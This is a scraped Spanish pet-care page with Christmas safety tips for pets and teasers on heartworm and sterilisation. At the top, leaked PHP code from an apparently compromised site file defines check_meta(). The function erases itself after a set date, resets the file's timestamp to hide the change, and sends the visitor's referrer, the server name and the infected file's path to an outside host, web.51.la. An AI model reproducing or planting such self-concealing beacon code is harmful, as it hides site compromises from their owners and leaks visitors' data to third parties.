check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732081){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Noticias

UniversoPyme

universopyme

Inscripción a boletín electrónico











Noticias
LA NAVIDAD Y LAS MASCOTAS PDF Imprimir E-mail

 Los muebles cambian de lugar, hay árboles, plantas y objetos (adornos) nuevos, olores y sonidos poco

familiares. Te compartimos algunos consejos que harán una Navidad segura para ti y para tu mascota:

  • Cuidado con los alimentos tradicionales navideños (los huesos del pavo, condimentos, dulces) comente a sus invitados la importancia de no compartir alimentos con su mascota o bien dígales que estuvo enfermo y debe ser muy cuidadoso con su dieta alimenticia.
  • Atención con las típicas velas de la época y cables de las luces navideñas. Si vas a encender velas procura tener a tu mascota supervisada para evitar un accidente o  un incendio. Los cables de las luces pueden ser atractivos para tu mascota y querrán jugar con ellos, puedes colocar sobre los cables un sabor disuasorio como pimienta.
  • Viajar con o sin mascota. Si decides llevar a tu mascota contigo a tus vacaciones, trata de hacerlo lo más cómodo posible atendiendo sus necesidades. Si por el contrario piensas dejarlo busca una persona de confianza que la cuide en la comodidad de su hogar o busca una pensión responsable y procura visitar las instalaciones antes de dejar ahí a tu mascota.
  • Durante la celebración navideña y la noche de año nuevo es tradición utilizar pirotecnia, algunas mascotas se ponen extremadamente nerviosas con estos sonidos y tienden a esconderse para protegerse o lo peor tienden a huir buscando un lugar de resguardo, corriendo el riesgo de ser atropellados o perderse. Es importante que en todo momento tu mascota tenga puesta su placa de ID. Existen métodos alternativos para ayudar a calmarlos como flores de bach y collares tranquilizantes. Es importante no reforzar esta conducta acariciando o abrazando a tu mascota mientras está nerviosa. Recuerda consultar con tu veterinario antes de suministrar cualquiera de estas opciones.
  • Procura no estresar a tu mascota respetando su rutina: hora de alimentos, paseos, juego, descanso. Normalmente recibimos visitas durante estas fechas debemos prestar especial atención en el abrir y cerrar de la puerta principal del hogar para evitar que nuestra mascota se salga y pueda perderse. Siempre supervisar a las mascotas jugando con los niños pues aunque sea sociable con ellos y nunca haya agredido, el estrés de la época puede ser suficiente para generar una reacción en nuestras mascotas.

¿Sabías que la tradicional planta de la Noche Buena es altamente tóxica para tu mascota? Si decoras tu casa con esta hermosa flor evita ponerla al alcance de tu mascota, ya que puede sufrir una intoxicación inmediata al masticarla misma que se manifiesta con irritación en el hocico, lengua y mucosas, incluso lesiones ulcerativas.

***Siguiendo estos consejos tu familia y tus mascotas podrán disfrutar de una celebración segura y agradable durante la época navideña.  

 ¡¡¡FELICES FIESTAS!!!

 
GUSANO DEL CORAZÓN PDF Imprimir E-mail

Gusano del Corazón, asesino silencioso...

¿Qué es?

El Gusano del Corazón (Dirofilaria Immitis) es un parásito que se transmite por la picadura de un mosquito portador (el mosquito es el principal medio de contagio, sin embargo, aunque es raro, también puede ser transmitido por algunas moscas, pulgas y garrapatas). Los mosquitos, como bien sabemos, se reproducen principalmente en lugares húmedos y calurosos. Sin embargo las zonas con climas templados o frí­os no están exentas de la existencia de estos insectos voladores, ya que basta un poco de agua estancada o humedad para que se reproduzcan. Si un mosquito portador pica a un perro, le transmitirá el parásito automáticamente. El parásito afecta a perros

Leer más...
 
Esterilización de perras y gatas PDF Imprimir E-mail

El fin de esterilizar (castrar) a nuestra compañeras es limitar su reproducción y evitar algunas situaciones relacionadas a su ciclo hormonal. Puede ser tan simple como ya no querer ver manchado el piso de la casa…evitarnos ese maullido inquietante y lastimero…..ya no tener diez perros fuera de la casa mientras le dura el celo…..hasta reducir el número de perros y gatos sufriendo en la calle, evitando su reproducción y promoviendo la adopción. Es una decisión complicada, pues influyen en ella todos los antecedentes que como personas tenemos.

Leer más...
 


Contador de Casos de Éxito

Contador_arriba
perrosarescatados
contador_izq0_cero6_seis7_siete4_cuatrocontador_izq

 

Patrocinadores

petmedical

Logo_delaCalle_a_la_Casa_

royal_canin

Logo_Croquetero

bus